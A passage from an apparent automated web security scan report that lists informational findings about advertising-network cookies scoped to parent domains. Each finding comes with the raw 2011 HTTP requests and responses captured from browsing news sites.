Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1rw0fxzt1tr37xzt1tr37xzt1rw0fxzt1tr37; adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh0v9kt00x3g020j0j50j; rdrlst=41i157rlklhm4000000043g0215smlkb5u20000000n3g0215sklkkpqq0000000c3g020hsnlkb5u20000000n3g020m7alkkxrb000000093g020x1blkkpqq0000000c3g020hsplkkpqq0000000c3g020m7flkkyyl000000073g0212gdlkkyy0000000083g020morlkkxrb000000093g021196lkkkbe0000000i3g021195lkkpqh0000000d3g021194lkkjj40000000j3g020dlxlkb5u20000000n3g020znmlk34620000000s3g021193lkkplo0000000f3g021192lkkpke0000000h3g020p46lkkpqq0000000c3g02008slklhm4000000043g020moylkl0r5000000053g020p1blkb5u20000000n3g0210tylkkpku0000000g3g020zr4lkb5u20000000n3g0200bvlk9pe80000000o3g0215xylk60qe0000000r3g0210poljyxb40000000u3g020e6llkl0r5000000053g0210telkd7nq0000000m3g020c9slk9pe80000000o3g0210rdlkdkly0000000k3g020mj2lkkxrb000000093g02159olk8fax0000000p3g020kualkkpqq0000000c3g020m0ulkl0r5000000053g020m45lkl0r5000000053g020m0plkkxrb000000093g020m40lkkxrb000000093g020mjelkkxrb000000093g0212qnlkkplt0000000e3g02167blkl0r5000000053g020bo8lkb5u20000000n3g020mjjlkl0r5000000053g021672lkkxrb000000093g020lw5lkb5u20000000n3g020ycrlkncow000000033g020zaalkb5u20000000n3g021203lkb5u20000000n3g02137rlkkpqq0000000c3g021204lkkyy0000000083g02137qlkb5u20000000n3g020afqlkb5u20000000n3g020o0vlkkpqx0000000b3g020z2ilkkxrb000000093g020ni1lkb5u20000000n3g02; sglst=20q0sag2lkd7nq0bnis00m3g020j0j50jc80lkb5u209jqc0063e000j00500c81lkkpke0000000h3g020j0h50ha6slkkpke0000000h3g020j0h50h0kllklhm4000000043g020j04504am5lkkxr8002zw00a3g020j0a50a9rslkkpke00s1q00h3g020j0h50h9q5lkb5u20abs200n3g020j0j50j0t7ljyxb40pxve00u3g020j0j50jdgflkkpke00s1q00h3g020j0h50hbo0lkb5u209jqc00n3g020j0j50jbo1lkkyy000io40083g020j08508aoplkb5u209jqc0063e000j00500d86lklhm4000000043g020j04504942lkb5u20abs200n3g020j0j50j8ndlkb5u20abs200n3g020j0j50j719lkb5u209jqc0063e000j0050071alkkpke00s1q00h3g020j0h50h56blkb5u20abs200n3g020j0j50jasulkb5u209jqc0063e000j00500dgilkb5u209jqc0063e000j00500c5rlkov6e000000023g020j025024wclkb5u209jqc0063e000j005008eklkkpke00s1q00h3g020j0h50h5mrlkb5u20abs200n3g020j0j50jbwjlkkyy000io40083g020j08508; vstcnt=417k010r0t4exp6103210e24ru4y1032107249v4u10pj10e22te10tq10a24tmhw103210924pq44103210a24eflo218e104203210724eyja103210e24mqca103210e24fvio118e10f24fz24103210924e8bw103210824fsuv103210924fduc118e10a24uzdp103210b24dret103210724gqhl103210923sti11hj10a24styu10321092451gt10pj10e24fj52103210924o2lt103210a24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b23l4f103210a24kd6k103210c2

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=016020a0e0f0g0h1ljtllpxzt1rw0fxzt1tr37xzt1tr37xzt1rw0fxzt113zyf; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Set-Cookie: adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh13zyf00y3l010k0150k; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=41c157rlklhm4000000053l0115sklkkpqq0000000d3l010m7alkkxrb0000000a3l010x1blkkpqq0000000d3l010hsplkkpqq0000000d3l010m7flkkyyl000000083l0112gdlkkyy0000000093l010morlkkxrb0000000a3l011196lkkkbe0000000j3l011195lkkpqh0000000e3l011194lkkjj40000000k3l010dlxlkb5u20000000o3l010znmlk34620000000t3l011193lkkplo0000000g3l01008slklhm4000000053l010p46lkkpqq0000000d3l011192lkkpke0000000i3l0110tylkkpku0000000h3l010p1blkb5u20000000o3l010moylkl0r5000000063l0100bvlk9pe80000000p3l0115xylk60qe0000000s3l0110poljyxb40000000v3l010e6llkl0r5000000063l0110telkd7nq0000000n3l010c9slk9pe80000000p3l0110rdlkdkly0000000l3l010mj2lkkxrb0000000a3l01159olk8fax0000000q3l010kualkkpqq0000000d3l010m0ulkl0r5000000063l010m45lkl0r5000000063l010m0plkkxrb0000000a3l010m40lkkxrb0000000a3l010mjelkkxrb0000000a3l0112qnlkkplt0000000f3l01167blkl0r5000000063l010bo8lkb5u20000000o3l010mjjlkl0r5000000063l011672lkkxrb0000000a3l010lw5lkb5u20000000o3l010ycrlkncow000000043l011203lkb5u20000000o3l01137rlkkpqq0000000d3l011204lkkyy0000000093l010o0vlkkpqx0000000c3l010z2ilkkxrb0000000a3l010ni1lkb5u20000000o3l01; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Set-Cookie: sglst=20q0sc80lkb5u209jqc0063e000j00500ag2lkd7nq0kdwe00n3l010k0150kc81lkkpke0000000i3l010k0150ia6slkkpke0000000i3l010k0150i9rslkkpke00s1q00i3l010k0150iam5lkkxr8002zw00b3l010k0150b0kllklhm4000000053l010k015059q5lkb5u20abs200o3l010k0150kdgflkkpke00s1q00i3l010k0150i0t7ljyxb40yo9000v3l010k0150kbo0lkb5u209jqc00o3l010k0150kbo1lkkyy000io40093l010k01509aoplkb5u209jqc0063e000j00500d86lklhm4000000053l010k01505942lkb5u20abs200o3l010k0150k8ndlkb5u20abs200o3l010k0150k719lkb5u209jqc0063e000j0050071alkkpke00s1q00i3l010k0150i56blkb5u20abs200o3l010k0150kasulkb5u209jqc0063e000j00500dgilkb5u209jqc0063e000j00500c5rlkov6e000000033l010k015034wclkb5u209jqc0063e000j005008eklkkpke00s1q00i3l010k0150i5mrlkb5u20abs200o3l010k0150kbwjlkkyy000io40093l010k01509; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Set-Cookie: vstcnt=417k010r134exp6103210e24tc6l103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24tmhw103210924n86o103210d24pq44103210a24eflo218e104203210724na8i103210e24eyja103210e24mqca103210e24nsyl103210f24jxig103210f24f9wk103210i24fvio218e20e20f203210f24fz24103210924e8bw103210824fsuv103210924fduc218e10a203210e24uzdp103210b24dret103210724gqhl103210923sti21hj10a203210e24cnyl103210g24styu10321092451gt10pj10e24fj52103210924o2lt103210a24nnav103210f24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b24hqyp103210i24kd6k103210c23l4f103210a2; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Location: http://ad.yieldmanager.com/unpixel?t=2&id=1124652&id=726483&id=1274357&id=1230287&id=1097682&id=919037
Content-Length: 0
Date: Mon, 09 May 2011 14:00:03 GMT

9.50. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODImdGw9MTU3NjgwMCZkcF9pZD0yMg==&piggybackCookie=pcv:1|uid:2931142961646634775 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889; KADUSERCOOKIE=29E43D8F-52C5-4C7B-B2EA-0181496E6671

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:09 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889; domain=pubmatic.com; expires=Thu, 01-May-2014 17:54:49 GMT; path=/
Content-Length: 1
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html

9.51. http://imp.fetchback.com/serve/fb/adtag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=59534&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26630-2.3200913.3219970?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; afl=1_1304903354; cre=1_1304949669_29807:59535:1:0_29802:59536:1:588698_29805:59534:1:589359; uid=1_1304949669_1303179323923:6792170478871670; kwd=1_1304949669_12936:254607_11317:1206401_11717:1206401_11718:1206401_11719:1206401; scg=1_1304949669; ppd=1_1304949669

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:12 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1304949672_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:12 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 14:01:12 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 294

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=59534&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26630-2.3200913.3219970?url=' width='728' heigh
...[SNIP]...
9.52. http://imp.fetchback.com/serve/fb/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=59534&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26630-2.3200913.3219970?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; afl=1_1304903354; cre=1_1304949669_29807:59535:1:0_29802:59536:1:588698_29805:59534:1:589359; kwd=1_1304949669_12936:254607_11317:1206401_11717:1206401_11718:1206401_11719:1206401; scg=1_1304949669; ppd=1_1304949669; uid=1_1304949672_1303179323923:6792170478871670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:14 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1304949674_29805:59534:2:0_29807:59535:1:5_29802:59536:1:588703; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: uid=1_1304949674_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: kwd=1_1304949674_12936:254612_11317:1206406_11717:1206406_11718:1206406_11719:1206406; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: scg=1_1304949674; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: ppd=1_1304949674; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 14:01:14 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10433

<style type="text/css">body {margin: 0px; padding: 0px;}</style>
<a href="http://imp.fetchback.com/serve/fb/overlay?8945eae51d9a2c8e4a5ff0a7577d8283a6c350af96ce36b3985a1944046ffd99d3a4259f239ce6c8683e
...[SNIP]...
9.53. http://ipcmedia.grapeshot.co.uk/channels.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ipcmedia.grapeshot.co.uk
Path:   /channels.cgi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /channels.cgi?url=http%3A//www.nme.com/news/sufjan-stevens/56527 HTTP/1.1
Host: ipcmedia.grapeshot.co.uk
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=1503275853

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: 600
GSCategories: olympics (10.846109)
GSID: hk7gfe0
GSResponse: OK
GSResponseDetails: C=1 BC=0 BF=0 CU=0 CC=0
GSUID: 1503275853
GSDeployment: nme
Set-Cookie: uid=1503275853; Path=/; Domain=.grapeshot.co.uk; Max-Age=31536000; Version=1
Connection: close
Content-Type: text/javascript
Content-Length: 114

// Set gs_channels variable for insertion into an advert call
// contextual categories
gs_channels = "olympics";

9.54. http://js.revsci.net/gateway/gw.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=B08725 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP15EOheQIMp6aIYFMFwqgWKICRGi4LkSGHuoVo77dVqa7OUgcXqUqruxUK6pw26DoqAlJFLZfT4Ux5SbqTCquHuUc/XRFeRyFWPT6EN6ib9rOgornIgakmFz75BmUiSaHo+JZst/oPR9Zq4Tt2uVGJOix55hSkJ3LJKPQI1gnqJcPO+B0wk0qpMSQXyFuCqQpK8r5tYBj/bmtqBKECRDiwMULcazzRzzBdevJ3YZlw1fzc91DujPMvIrU3lBGHD+Oj3GY34vTCgAsALTSPABX9K+qdf26V67jxb2rFhuao8e8wHgc9RUGL1UarXrcKQoVg0O/dT54uSAyDaigAqzmSFzhzgmZT9BJMxPzc4NCP+DgolO7MVTtmzKnuBLvpPBvKHLv25Ok9kGqHBB+5DATvbNCMmEyH/IFwSZOzLes1MyDqRGKgNkRhQbjaoTJLPdtrCZICmiIGgDOjcsfvI7HUAbHc5uDjeMNE0BTWYE73Cg/viOkfNPjdw0BwOKK7W5JcIsu2UEjjN2Zn/OkFtTDweZtF; rtc_dGQ8=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; rsiPus_wuF1="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8aleSaGIyXRDs4FkB8sFCZuw+T+165hyVBVJdSmUgvaZFUEgQ++TCUEHmPCzXDcHU3/q71ALbK2PSrJN+jB0Gcwa4UhPEVrUN6TcHwqPWgepSOQrGAM308YkJ9Kue16ot0nIp6qAd3oiL1vu8ImerbnCX9fr9JwgYkrBhGapemCFDjspZk1rtEaWVVb/SLwdVTkAbzsNzSnzwc5wGCa8jVcpLL1HEVmqAjL5TwOMK3qCqjZRxHhcVoCO32Vm2a4+oGoVsu6f5cdmr702F+fO8bJ0zUZTlrWdNQF76rVKVigm4I2aRP1upzq3Xa844B3rJfxR7kbIeqiNcOFqKbSbO0FyTBJmabs/5OGsVm8MzaWv8XDRsNoP6aqXleVpyBBYMCmndtzdvmN0PX2PGTSEgHhHEOXIef+hyFlWIYJXhKyB1GZ1nN2HxLnlweSc/bw47BG+TDLVioZi40WnLGVk5Z4CwWDF0HwdzaazFGEJnNpjYIdAXTH/lTD8va6y4gx9mPASTJgNc22xlesGWI7OxZl1lqQ7HaLFB1HNYBtc5bP7IeCvhsYBGZg7cviKgAqSA9rxV77UbSt7TCcEyrrWjO+3NEalTV9bExjEijsonVl1qiCkFcvi4aTfn0Xp29/bqHk9TGMy+VTExoryi89XrlvZChiv8aCqD5nn1swwyeI8WXt6PokJinNDm627rLE7xLD9GZAmT4EC6DnSNF66FJKT8gRriX0keP+ld6zjtUeyx5jDTsazJK/T22dm7i42KiJZZ+f3mfdl1R07uyRQ6zBPxN70+SfMEN0VDs+0K+P2dhEnHBFEMNjU7Q45KqoSl8BK7apDExjVxjQh+dsxHVzgaFZsZaqXyOVXEIOp8oSNlzyOlBEIL/wfuQMfqNOFtMORF41x2ag+MOqOOgTOdugSJ08l6FYGH5XPnZQcM6Qwefavxgc9IzEXOoF0bdiHi8Phz+D5O/sUnh+KES8fiVsIqDkgN/d4VXR+Bqtve+rF1K2Zq3A=="; 